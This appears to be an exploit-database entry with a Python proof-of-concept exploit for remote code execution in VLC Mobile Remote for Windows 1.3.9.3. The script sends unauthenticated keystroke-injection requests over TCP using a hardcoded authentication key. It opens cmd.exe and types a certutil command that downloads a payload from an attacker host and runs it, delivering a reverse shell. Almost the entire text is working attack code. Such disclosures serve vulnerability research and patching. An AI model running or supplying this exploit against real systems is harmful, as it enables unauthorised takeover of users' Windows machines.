📄 VLC Mobile Remote for Windows 1.3.9.3 Remote Code Execution

# Exploit Title: VLC Mobile Remote (VMR) for Windows v1.3.9.3 RCE V2
    # Date: 06/24/2025
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://vlcmobileremote.com
    # Software Link: https://vlcmobileremote.com/Releases/Setup.exe
    # Version: 1.3.9.3
    # Tested on: Windows 10 (Build 19044)
    
    '''
    Description:
    
    VLC Mobile Remote for Windows 1.3.9.3 allows remote code execution via
    unauthenticated keystroke injection over TCP, enabling command execution
    and reverse shell delivery.
    
    '''
    
    import socket, time, json, urllib.parse
    
    host, port = "192.168.8.105", 5916
    auth = "I2t3H*9s65J7F!E03K9M"
    lhost = "192.168.8.100"
    payload = "shell.exe"
    cmd = f"certutil -urlcache -split -f http://{lhost}/{payload}
    C:\\Windows\\Temp\\payload.exe & C:\\Windows\\Temp\\payload.exe"
    cmds = [
        ("launch_url", "file://C:/Windows/System32/cmd.exe", "Launch CMD"),
        ("textinput", urllib.parse.quote(cmd), "Send command"),
        ("enter", "", "Run command")
    ]
    
    with socket.socket() as s:
        s.connect((host, port))
        for k, v, label in cmds:
            req = f"/requests/keyboard/command?key={k}&value={v}" if k !=
    "launch_url" else f"/requests/system/command?key={k}&value={v}"
            pkt = {"appAuthenticationKey": auth, "password": "", "sentTime":
    str(int(time.time() * 1000)), "request": req}
            s.sendall((json.dumps(pkt) + "\x0a").encode())
            print(f"[>] {label}")
            time.sleep(3 if k == "launch_url" else 1)
    
    print("[✓] Done.")